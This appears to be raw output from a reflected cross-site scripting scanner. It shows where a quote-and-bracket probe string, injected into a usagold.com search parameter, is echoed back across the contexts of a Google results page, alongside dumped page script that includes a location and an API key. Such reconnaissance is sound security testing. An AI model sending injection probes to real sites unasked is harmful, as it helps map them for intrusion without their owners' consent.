https://www.usagold.com/

GET Params:[2]
['sitesearch', 'q']
_______________________________________________________________________________________________________
https://www.google.com/search?sitesearch=(uvw"xyz'yxz</zxy&q=

----------------------------------------------------------------------------------
Attribute Context: [2]
<input class="gLFyf gsfi" maxlength="2048" name="q" type="text" jsaction="paste:puy29d" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" role="combobox" spellcheck="false" title="Search" value="site:(uvw%22xyz%27yxz%3C/zxy" aria-label="Search" data-ved="0ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q39UDCAk">
<div jsdata="GXYZuf;;AAr68M" jscontroller="G3eKy" jsl="$t t-w-XilABeKRA;$x 0;" class="r-iPlsjhYh2Vzk">

----------------------------------------------------------------------------------
HTML Context: [3]
<title>site:(uvw%22xyz%27yxz%3C/zxy - Google Search</title>
<b>(uvw%22xyz%27yxz%3C/zxy</b>
<em>site:(uvw%22xyz%27yxz%3C/zxy</em>

----------------------------------------------------------------------------------
Script Context: [1]
<script nonce="UwKB7yZaFqbta/I7sX9lUQ==">(function(){google.ldi={};google.pim={};})();(function(){var u='/xjs/_/js/k\x3dxjs.s.en_GB.YlbWwcv8Rzo.O/ck\x3dxjs.s._psGpbc7COU.L.W.O/m\x3dFkg7bd,HcFEGb,IvlUe,MC8mtf,OF7gzc,RMhBfe,T4BAC,TJw5qb,TbaHGc,Y33vzc,ZyRBae,cdos,hsm,iDPoPb,jsa,mvYTse,tg8oTe,uz938c,vWNDde,ws9Tlc,yQ43ff,d,csi/am\x3dAAQAAMASgN1_AJz_TQAAF8w4AAAggBvBxgIpIqEgAAGsuggCAQ/d\x3d1/dg\x3d2/ct\x3dzgms/rs\x3dACT90oFuyKfbF9uXoqhw1SIh5QdvAjdEHw';
setTimeout(function(){var b=document;var a="SCRIPT";"application/xhtml+xml"===b.contentType&&(a=a.toLowerCase());a=b.createElement(a);a.src=u;google.timers&&google.timers.load&&google.tick&&google.tick("load","xjsls");document.body.appendChild(a)},0);})();(function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.YlbWwcv8Rzo.O/ck\x3dxjs.s._psGpbc7COU.L.W.O/m\x3dFkg7bd,HcFEGb,IvlUe,MC8mtf,OF7gzc,RMhBfe,T4BAC,TJw5qb,TbaHGc,Y33vzc,ZyRBae,cdos,hsm,iDPoPb,jsa,mvYTse,tg8oTe,uz938c,vWNDde,ws9Tlc,yQ43ff,d,csi/am\x3dAAQAAMASgN1_AJz_TQAAF8w4AAAggBvBxgIpIqEgAAGsuggCAQ/d\x3d1/dg\x3d2/ct\x3dzgms/rs\x3dACT90oFuyKfbF9uXoqhw1SIh5QdvAjdEHw';})();function _DumpException(e){throw e;}
function _F_installCss(c){}
(function(){google.spjs=false;google.snet=true;google.em=[];google.emw=false;google.pdt=0;google.uwp=false;})();(function(){var pmc='{\x22Fkg7bd\x22:{},\x22HcFEGb\x22:{},\x22IvlUe\x22:{},\x22MC8mtf\x22:{},\x22OF7gzc\x22:{},\x22RMhBfe\x22:{},\x22T4BAC\x22:{},\x22TJw5qb\x22:{},\x22TbaHGc\x22:{},\x22Y33vzc\x22:{},\x22ZyRBae\x22:{},\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22bgd\x22:{\x22ac\x22:true,\x22as\x22:true,\x22at\x22:0,\x22ea\x22:true,\x22ed\x22:0,\x22ei\x22:true,\x22el\x22:true,\x22ep\x22:true,\x22er\x22:true,\x22et\x22:0,\x22eu\x22:false,\x22wl\x22:false},\x22cdos\x22:{\x22cdobsel\x22:false},\x22csi\x22:{},\x22d\x22:{},\x22ddls\x22:{},\x22dvl\x22:{\x22cookie_secure\x22:true,\x22cookie_timeout\x22:86400,\x22driver_ui_type\x22:2,\x22jsc\x22:\x22[null,null,null,30000,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[\\\x2286400000\\\x22,\\\x22604800000\\\x22,2.0]\\n,null,1]\\n\x22,\x22mnr_crd\x22:\x221\x22,\x22msg_dsc\x22:\x22From your Internet address\x22,\x22msg_dsc_url\x22:\x22\x22,\x22msg_dvl\x22:\x22From your device\x22,\x22msg_err\x22:\x22Location unavailable\x22,\x22msg_gps\x22:\x22Using GPS\x22,\x22msg_unk\x22:\x22Unknown\x22,\x22msg_upd\x22:\x22Update location\x22,\x22msg_use\x22:\x22Use precise location\x22,\x22uul_text\x22:\x22Lahore\x22},\x22foot\x22:{\x22pf\x22:true,\x22po\x22:true,\x22qe\x22:false},\x22gf\x22:{\x22pid\x22:196},\x22hsm\x22:{},\x22iDPoPb\x22:{},\x22jsa\x22:{\x22csi\x22:true,\x22csir\x22:100},\x22kyn\x22:{},\x22llc\x22:{},\x22lli\x22:{},\x22lu\x22:{},\x22m\x22:{},\x22mUpTid\x22:{},\x22mpck\x22:{\x22me\x22:false},\x22mu\x22:{\x22murl\x22:\x22https://adservice.google.com/adsid/google/ui\x22},\x22mvYTse\x22:{},\x22sb_wiz\x22:{\x22rfs\x22:[],\x22stok\x22:\x22xwI8vD7QUbEhTp80gHtE8XMxQRw\x22},\x22sf\x22:{},\x22sonic\x22:{},\x22spch\x22:{\x22ae\x22:\x22Please check your microphone.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003ELearn more\\u003C/a\\u003E\x22,\x22hl\x22:\x22en-PK\x22,\x22im\x22:\x22Click \\u003Cb\\u003EAllow\\u003C/b\\u003E to start voice search\x22,\x22iw\x22:\x22Waiting...\x22,\x22lm\x22:\x22Listening...\x22,\x22lu\x22:\x22%1$s voice search not available\x22,\x22mb\x22:false,\x22ne\x22:\x22No Internet connection\x22,\x22nt\x22:\x22Didn\x27t get that. \\u003Cspan\\u003ETry again\\u003C/span\\u003E\x22,\x22nv\x22:\x22Please check your microphone and audio levels.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003ELearn more\\u003C/a\\u003E\x22,\x22pe\x22:\x22Voice search has been turned off.  \\u003Ca href\x3d\\\x22https://support.google.com/chrome/?p\x3dui_voice_search\\\x22 target\x3d\\\x22_blank\\\x22\\u003EDetails\\u003C/a\\u003E\x22,\x22rm\x22:\x22Speak now\x22},\x22tg8oTe\x22:{},\x22tl\x22:{\x22rvkey\x22:\x22AIzaSyC_9Rt88UMjzgg5pIVArnfuIVkJx4zCdTY\x22},\x22uz938c\x22:{},\x22vWNDde\x22:{},\x22vs\x22:{},\x22ws9Tlc\x22:{},\x22yQ43ff\x22:{}}';google.pmc=JSON.parse(pmc);})();(function(){var r=['sb_wiz','aa','abd','async','bgd','dvl','foot','kyn','lli','lu','m','mUpTid','mpck','mu','sf','sonic','spch','tl','vs','exdc'];google.plm(r);})();(function(){var m=[[["root",[["t-w-XilABeKRA","iPlsjhYh2Vzk","r-iPlsjhYh2Vzk",null,null,"exdc"]
]
,""]
]
]
;google.jsc&&google.jsc.m(m);google.log('rfl','');})();(function(){var m=['AAr68E','[\x22psy-ab\x22,\x22gws-wiz\x22,\x22site:(uvw%22xyz%27yxz%3C/zxy\x22,\x22\x22,null,1,0,0,11,\x22en\x22,\x22xwI8vD7QUbEhTp80gHtE8XMxQRw\x22,\x22\x22,\x22fn6UXs27FaKc4-EPxaCe6A4\x22,0,\x22en-PK\x22,null,null,null,0,null,null,3,5,null,null,0,-1,0,0,0,\x22\x22,0,0,\x22\x22,null,0,null,0,null,\x22/suggest\x22,0,0,0,0,0]\n','AAr68I','[0,0,0,[null,null,[[[3,null,null,[null,[[\x22qdr_\x22,1,6]\n,[\x22qdr_h\x22,0,6]\n,[\x22qdr_d\x22,0,6]\n,[\x22qdr_w\x22,0,6]\n,[\x22qdr_m\x22,0,6]\n,[\x22qdr_y\x22,0,6]\n,[\x22cdr_opt\x22,0,1,[1,\x22Custom range...\x22,null,\x22cdr:1,cd_min:x,cd_max:x\x22,\x22\x22,\x22text\x22,\x22\x22,\x22\x22,6,1,[[[\x22q\x22,\x22site:(uvw%22xyz%27yxz%3C/zxy\x22]\n]\n]\n,\x22cdr_opt\x22,\x225/23/2004\x22,0]\n]\n]\n,0]\n]\n,[3,null,null,[null,[[\x22li_\x22,1,6]\n,[\x22li_1\x22,0,6]\n]\n,1]\n]\n]\n,null,[\x22tbs\x22]\n]\n]\n,null,null,[null,[[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\x22,null,null,\x22All\x22,1,null,1,null,null,\x22WEB\x22,[0,2]\n,null,null,0]\n,[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\\u0026tbm\\u003disch\x22,null,null,\x22Images\x22,0,null,1,null,null,\x22IMAGES\x22,[6,2]\n,null,null,6]\n,[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\\u0026tbm\\u003dnws\x22,null,null,\x22News\x22,0,null,1,null,null,\x22NEWS\x22,[10,2]\n,null,null,10]\n]\n,[[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\\u0026tbm\\u003dvid\x22,null,null,\x22Videos\x22,0,null,1,null,null,\x22VIDEOS\x22,[13,2]\n,null,null,13]\n,[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\\u0026tbm\\u003dbks\x22,null,null,\x22Books\x22,0,null,1,null,null,\x22BOOKS\x22,[2,2]\n,null,null,2]\n,[\x22/search?q\\u003dsite:(uvw%2522xyz%2527yxz%253C/zxy\\u0026source\\u003dlnms\\u0026tbm\\u003dfin\x22,null,null,\x22Finance\x22,0,null,1,null,null,\x22FINANCE\x22,[22,2]\n,null,null,22]\n]\n]\n,null,1]\n','AAr68M','[0,\x22inline\x22,2,2500,0,0]\n','AAr68Q','[null,null,1,30000,null,null,null,2,null,null,3,null,null,null,null,null,1,null,null,null,null,null,null,[31.506432,74.3473152]\n,null,null,null,null,0,null,null,null,null,null,null,null,0,\x221586790014\x22,null,null,null,null,null,1,null,null,[\x2286400000\x22,\x22604800000\x22,2.0]\n,null,1]\n','AAr68U','[\x22https://www.google.com.pk/domainless/read?igu\\u003d1\x22,\x22AFz9ztui3hqNyEZWi73DT51bzZ48bus6qw:1586790014493\x22,3]\n','AAr68Y','[1,null,null,1261,1349,0]\n'];
var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"Yllh3e":"%.@.1586790014351693,104386082,3976695877]\n","zChJod":"%.@.]\n","pxO4Zd":"0","GWsdKe":"en-PK","SIsrTd":"false","LU5fGb":"false","w2btAe":"%.@.\"\",\"\",\"0\",null,null,null,1]\n","eptZe":"/_/WizRpcUi/","mXOY5d":"%.@.null,1]\n","fyLpDc":"","SsQ4x":"UwKB7yZaFqbta/I7sX9lUQ\u003d\u003d","I69zkb":"rgba(204,204,204,.25)","wku5sd":"false","jIrJIf":"14","qmiCId":"true","hqg9c":"#1878f0","JVBnre":"false","pxDH4c":"#0f9d58","BW8dtd":"rgba(248, 248, 248, 1)","WxHUzd":"true","Hzi6pf":"#DFE1E5","RZ03Ve":"#5677fc","RpI44b":"#ebebeb","dAFa0e":"false","fQC6Cf":"2px","pch72b":"false","bmQ7Rb":"false","y519we":"true","ENmP1c":"rgba(204,204,204,.15)","TUhOL":"#fafafa","tqXjO":"false","tpLZye":"#fff","prFQBe":"#ebebeb","fjc61":"false","abZ6pc":"#f9a825","YXGVrd":"true","A2aVpb":"50","sBpVac":"rgba(0,0,0,.26)","o9mzkf":"false","V0Bluc":"none","FF58Bf":"true","oFa0q":"#fafafa","HjM8R":"#FFF","NW4nA":"rgba(255,255,255,.7)","PYrjqe":"40","kePaAc":"-4","bVUXme":"25","VXIo7d":"8px","FbN3Qc":"rgba(0,0,0,.87)","NIYCKf":"28","VbmVYd":"true","Sgnmlc":"14px","rsd6be":"1","jg5SCd":"false","SATNMc":"1px solid #dfe1e5","iryGqc":"2","eXPt4e":"400","aKuscd":"#AECBFA","tqmosb":"#fff","TKn0F":"20px","xeVOLe":"#689f38","hgWJ8c":"false","S1ZUDf":"true","qDYzS":"0 2px 10px 0 rgba(0,0,0,0.2)","fFepd":"-15","GTYTQ":"#ffeb3b","i7mh3e":"16","haqSDf":"rgba(0,0,0,.54)","X1bUEc":"arial,sans-serif-medium,sans-serif","ppkaeb":"0","VnH1Zb":"normal","LIYDac":"arial,sans-serif","g635Ab":"2px","pPtK5":"6","EgTnfe":"true","iwHJId":"15","JyBo2c":"false","NvsKMd":"true","EuCkcd":"16","X4yPd":"#1c3aa9","ruHO7c":"#dd191d","T1V3fc":"#f4b400","lzJv9d":"#fff","khoEPb":"#1a0dab","z70S0c":"false","q7vEEb":"false","QSF9Ec":"","kVbEH":"false","nMRhJe":"false","AQEr7b":"#c6c6c6","FydCC":"true","voc95c":"false","UnFEre":"16","Na6wt":"#e1e1e1","in3Ilb":"#222","iKzRxb":"#5f6368","PIn0Ab":"1px solid #DFE1E5","bDOvJc":"false","n1Whrf":"false","WMBRj":"#009688","BoqNoc":"20px","KnXmRc":"10","W445Dc":"20","V6eh7c":"16","zhBJde":"false","EJG4vf":"pointer","aUt4Tc":"false","UNVSy":"false","fRkoq":"true","gbf9Eb":"58","KTkDB":"false","u4NTBb":"40","b1KZw":"#fff","lVRwic":"false","AwPxw":"false","ZMFELd":"false","BdVmgf":"16","yFVHo":"true","wFGKdc":"false","gir54":"0.4","zhkRO":"%.@.1,1,1,1,1,1,0,0,0,1]\n","vIMrp":"true","OQZvxe":"0 2px 10px 0 rgba(0,0,0,0.2)","ymIfqf":"18","PngPbb":"rgba(0,0,0,.87)","OjG6Qc":"#000","owXwYb":"#f8f8f8","bmAEG":"#d9d9d9","uRoR4d":"false","MOPyub":"15","kL6Xwb":"false","KFdH8":"true","LACYrf":"false","JpB3Ue":"60","aD6AQe":"#757575","pLhKvc":"0","UduJSb":"%.@.\"0 0\",0,0,20,20,\"/images/searchbox/desktop_searchbox_sprites302_hr.png\",\"20px\"]\n","tuTJ6d":"#b8b8b8","KdGe5c":"false","Tae7A":"true","QnH6ad":"16","sPiebd":"false","y1HZEd":"false","L6WyEf":"true","Vdtb3d":"true","p7BdKe":"true","PuOePe":"false","Utapxe":"-webkit-","xFbXr":"rgba(0,102,33,1)","VQfWj":"#c0c0c0","ib0wve":"rgba(153,153,153,.2)","SidP2e":"rgba(248, 248, 248, 0)","rZYUef":"#f5f5f5","kkVYtc":"false","WnrBce":"rgba(0,0,0,.1)","PPUcAe":"0px 0px 8px rgba(32, 33, 36, .24)","a8Umdd":"rgba(153,153,153,.4)","QldWK":"6","IvNqzc":"true","ue6nDb":"Roboto-Medium,Roboto-Regular","zHtpPb":"false","EiEfXb":"#ebebeb","ConpTc":"false","iniaFd":"true","ZzVVh":"false","QA73ad":"false","xz9C5b":"true","R9GQh":"#fff","OqjdAf":"true","A5tF3b":"false","X4DPRd":"true","BwgO5":"16","SfSmD":"#ebebeb","h29koe":"32","dTMnbc":"false","D8A8he":"true","umYEvb":"false","FYBlgf":"false","pDiOce":"false","Dc0uuf":"16","H7aRye":"0px 5px 26px 0px rgba(0, 0, 0, 0.22), 0px 20px 28px 0px rgba(0, 0, 0, 0.30)","o28sBd":"false","JcUGee":"rgba(0,0,0,.54)","IfHuyb":"rgba(0,0,0,.54)","v44rSc":"#70757a","S7nbec":"16","rx1dvd":"#f3f3f3","N31mf":"false","hbfefd":"#1A73E8","rWPbFe":"rgba(255,255,255,1)","srQSvc":"true","eo8dye":"#878787","s6Rzec":"0 16px","RJegIe":"#fffff0","e2p8ee":"false","y2Hs7d":"false","bXvyY":"#fff","XgWQKd":"true","KgXmrd":"true","QDXUyc":"#188038","osNyZ":"1.0","Ym5Ycb":"false","AEMHld":"#eeeeee","SezQgf":"500","wB1JTc":"false","buGAI":"16","ODgkgd":"#fff","AYXCHc":"false","Vzh4p":"0px 7px 6px -5px #DFE1E5","imHXAf":"true","cdRSXc":"false","ekXXzb":"13px","xDKXr":"false","EqX55c":"652","rX9Pnb":"16","o07h3e":"0 4px 5px rgba(0,0,0,.16)","tJ4Jdf":"11","HWmJg":"#dcdcdc","AP8pqf":"rgba(0,0,0,.12)","Rnt1Qc":"false","hWyTvf":"false","wlwuHd":"false","seVajd":"rgba(0,0,0,.12)","ZLr84e":"true","MiTaT":"#1A73E8","gqXETb":"#db4437","rRLesf":"0","ZxI7Af":"#fafafa","F4ULTd":"true","xBx7Dc":"36","LnZAkd":"false","qkXvHd":"500","BYw9f":"false","iDTSkb":"true","KD9WYe":"#1A73E8","SpZHZd":"true","j0DpSe":"false","z1x4kc":"true","JRGsye":"none","lLCPB":"true","j9ZYRc":"true","MoAfyf":"#fff","GzC2p":"#fff","ToXxme":"#e5e5e5","vhCwfc":"false","kvKIW":"false","eE52Jd":"#5f6368","U6xP0":"#4285f4","Mlljec":"false","xT28q":"false","PxA5sf":"rgba(0,0,0,.54)","tyCgpc":"#fff","SuQiSc":"1.3","qj36Ef":"#323232","eGDqv":"false","WyvaRd":"0 1px 1px rgba(0,0,0,.16)","By1ejd":"16","KVmtZc":"rgba(255,255,255,.3)","auaxA":"#222","klgere":"invert(1) hue-rotate(180deg)","B0husb":"true","a7rhWc":"false","gjAni":"#3c4043","K2vQjf":"#f8f8f8","xvI8we":"#212121","Fcb4A":"#1A73E8","B8Dib":"rgba(0,0,0,.87)","AYVQWe":"20px","mJempe":"13","k7G1xb":"15","WWz0vd":"false","Nk1Bhf":"#4285f4","YWHUvb":"18px","FiZWae":"32","oyB9kf":"rgba(0,0,0,.87)"};window.IJ_values=["#fff","rgba(0,102,33,1)","rgba(0,0,0,.87)","rgba(0,0,0,.54)","rgba(255,255,255,1)","rgba(255,255,255,.7)",false,"%.@.\"\",\"\",\"0\",null,null,null,1]\n","0","%.@.null,1]\n","%.@.]\n","UwKB7yZaFqbta/I7sX9lUQ\u003d\u003d","%.@.\"0 0\",0,0,20,20,\"/images/searchbox/desktop_searchbox_sprites302_hr.png\",\"20px\"]\n","en-PK",false,"","%.@.1586790014351693,104386082,3976695877]\n",false,"/_/WizRpcUi/"];})();google.x(null, function(){(function(){(function(){google.csct={};google.csct.ps='AOvVaw3b9YUg6BdpSKxCjv6NdKm9\x26ust\x3d1586876414397221';})();})();(function(){(function(){google.csct.pi=true;})();})();(function(){(function(){
function f(){for(var c="&cshid="+google.cshid,d=document.querySelectorAll('[href^="/"]'),e=0,b;b=d[e++];){var a=b.getAttribute("href");a.match(/[\?|&](ei|ved)=/)&&-1==a.indexOf("cshid=")&&(-1==a.search("#")?b.setAttribute("href",a+c):(a=a.split("#"),b.setAttribute("href",a[0]+c+"#"+a[1])))}d=document.querySelectorAll("[ping]");for(e=0;b=d[e++];)a=b.getAttribute("ping"),-1==a.indexOf("cshid=")&&b.setAttribute("ping",a+c)};google.csh=google.csh||{};google.csh.ict=function(c){google.cshid&&(c&&window.MutationObserver?google.dclc(function(){(new MutationObserver(f)).observe(document.querySelector("body"),{attributes:!0,childList:!0,subtree:!0,characterData:!0})}):google.dclc(f))};}).call(this);})();(function(){(function(){var umo=false;google.csh.ict(umo);})();})();(function(){window.jsl=window.jsl||{};window.jsl.dh=window.jsl.dh||function(i,c,d){try{var e=document.getElementById(i);if(e){e.innerHTML=c;if(d){d();}}else{if(window.jsl.el){window.jsl.el(new Error('Missing ID.'),{'id':i});}}}catch(e){if(window.jsl.el){window.jsl.el(new Error('jsl.dh'));}}};})();(function(){window.jsl.dh('hdtbMenus','\x3cdiv class\x3d\x22hdtb-mn-cont\x22\x3e\x3cdiv id\x3d\x22XJDHvf\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22hdtb-mn-hd\x22 aria-haspopup\x3d\x22true\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22\x3e\x3cdiv class\x3d\x22mn-hd-txt\x22\x3eAny time\x3c/div\x3e\x3cspan class\x3d\x22mn-dwn-arw\x22\x3e\x3c/span\x3e\x3c/div\x3e\x3cul class\x3d\x22hdtbU hdtb-mn-c\x22\x3e\x3cli class\x3d\x22hdtbItm hdtbSel\x22 id\x3d\x22qdr_\x22 tabindex\x3d\x220\x22\x3eAny time\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_h\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:h\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBY\x22\x3ePast hour\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_d\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:d\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBc\x22\x3ePast 24 hours\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_w\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:w\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBg\x22\x3ePast week\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_m\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:m\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBk\x22\x3ePast month\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22qdr_y\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dqdr:y\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBo\x22\x3ePast year\x3c/a\x3e\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22vjyzWd\x22\x3e\x3cdiv jscontroller\x3d\x22Uuupec\x22 data-m\x3d\x22true\x22\x3e\x3cspan class\x3d\x22q\x22 id\x3d\x22cdrlnk\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22EEGHee\x22 data-ved\x3d\x222ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEBs\x22\x3eCustom range...\x3c/span\x3e\x3cdiv class\x3d\x22n5Ug4b\x22 style\x3d\x22display:none\x22\x3e\x3cdiv class\x3d\x22vOvh1b\x22 jsaction\x3d\x22xp3IKd\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22J6UZg\x22\x3e\x3cdiv class\x3d\x22Jy9Ore\x22\x3eCustomised date range\x3c/div\x3e\x3clabel class\x3d\x22Qtsmnf tmDYm\x22 for\x3d\x22OouJcb\x22\x3eFrom\x3c/label\x3e\x3clabel class\x3d\x22Qtsmnf iWBKNe\x22 for\x3d\x22rzG2be\x22\x3eTo\x3c/label\x3e\x3cdiv class\x3d\x22Gwgzqd\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22xp3IKd\x22\x3e\x3c/div\x3e\x3cdiv class\x3d\x22NwEGxd\x22\x3e\x3cdiv class\x3d\x22qomYCd\x22\x3e\x3c/div\x3e\x3cform action\x3d\x22/search\x22 class\x3d\x22T3kYXe\x22 method\x3d\x22get\x22\x3e\x3cinput name\x3d\x22q\x22 value\x3d\x22site:(uvw%22xyz%27yxz%3C/zxy\x22 type\x3d\x22hidden\x22\x3e\x3cinput name\x3d\x22source\x22 type\x3d\x22hidden\x22 value\x3d\x22lnt\x22\x3e\x3cinput value\x3d\x22cdr:1,cd_min:x,cd_max:x\x22 id\x3d\x22HjtPBb\x22 name\x3d\x22tbs\x22 type\x3d\x22hidden\x22\x3e\x3cinput value\x3d\x22\x22 name\x3d\x22tbm\x22 type\x3d\x22hidden\x22\x3e\x3cinput class\x3d\x22OouJcb ktf mini\x22 type\x3d\x22text\x22 value\x3d\x22\x22 autocomplete\x3d\x22off\x22 id\x3d\x22OouJcb\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22focus:daRB0b\x22\x3e\x3cinput class\x3d\x22rzG2be ktf mini\x22 type\x3d\x22text\x22 value\x3d\x22\x22 autocomplete\x3d\x22off\x22 id\x3d\x22rzG2be\x22 tabindex\x3d\x220\x22 jsaction\x3d\x22focus:daRB0b\x22\x3e\x3cinput class\x3d\x22Ru1Ao ksb mini\x22 value\x3d\x22Go\x22 tabindex\x3d\x220\x22 type\x3d\x22submit\x22 jsaction\x3d\x22tnv.scf\x22\x3e\x3c/form\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e\x3c/li\x3e\x3c/ul\x3e\x3cspan class\x3d\x22hQKUmb\x22\x3e\x3c/span\x3e\x3cdiv class\x3d\x22hdtb-mn-hd\x22 aria-haspopup\x3d\x22true\x22 role\x3d\x22button\x22 tabindex\x3d\x220\x22\x3e\x3cdiv class\x3d\x22mn-hd-txt\x22\x3eAll results\x3c/div\x3e\x3cspan class\x3d\x22mn-dwn-arw\x22\x3e\x3c/span\x3e\x3c/div\x3e\x3cul class\x3d\x22hdtbU hdtb-mn-c\x22\x3e\x3cli class\x3d\x22hdtbItm hdtbSel\x22 id\x3d\x22li_\x22 tabindex\x3d\x220\x22\x3eAll results\x3c/li\x3e\x3cli class\x3d\x22hdtbItm\x22 id\x3d\x22li_1\x22\x3e\x3ca class\x3d\x22q qs\x22 href\x3d\x22/search?q\x3dsite:(uvw%2522xyz%2527yxz%253C/zxy\x26amp;source\x3dlnt\x26amp;tbs\x3dli:1\x26amp;sa\x3dX\x26amp;ved\x3d2ahUKEwjN8o251eXoAhUizjgGHUWQB-0QpwV6BAgBEB4\x22\x3eVerbatim\x3c/a\x3e\x3c/li\x3e\x3c/ul\x3e\x3cspan class\x3d\x22hQKUmb\x22\x3e\x3c/span\x3e\x3c/div\x3e');})();(function(){google.drty&&google.drty();})();});</script>

----------------------------------------------------------------------------------
URI Context: [12]
<a href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;gbv=1&amp;sei=fn6UXs27FaKc4-EPxaCe6A4">
<a class="gb_4 gb_5 gb_he gb_1c" href="https://accounts.google.com/ServiceLogin?hl=en&amp;passive=true&amp;continue=https://www.google.com/search%3Fsitesearch%3D(uvw%2522xyz%27yxz%253C/zxy%26q%3D" target="_top">
<a class="q qs" href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;source=lnms&amp;tbm=isch&amp;sa=X&amp;ved=2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q_AUoAXoECAEQAw">
<a class="q qs" href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;source=lnms&amp;tbm=nws&amp;sa=X&amp;ved=2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q_AUoAnoECAEQBA">
<a class="f9UGee q qs" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;source=lnms&amp;tbm=vid&amp;sa=X&amp;ved=2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q_AUoAHoECAEQBg">
<a class="f9UGee q qs" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;source=lnms&amp;tbm=bks&amp;sa=X&amp;ved=2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q_AUoAXoECAEQBw">
<a class="f9UGee q qs" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/search?q=site:(uvw%2522xyz%2527yxz%253C/zxy&amp;source=lnms&amp;tbm=fin&amp;sa=X&amp;ved=2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Q_AUoAnoECAEQCA">
<a href="/preferences?hl=en&amp;prev=https://www.google.com/search?sitesearch%3D(uvw%252522xyz%252527yxz%25253C/zxy%26q%3D" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Qo_oBegQIARAK">
<a href="/preferences?hl=en&amp;prev=https://www.google.com/search?sitesearch%3D(uvw%252522xyz%252527yxz%25253C/zxy%26q%3D#languages" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwjN8o251eXoAhUizjgGHUWQB-0Qo_oBegQIARAL">
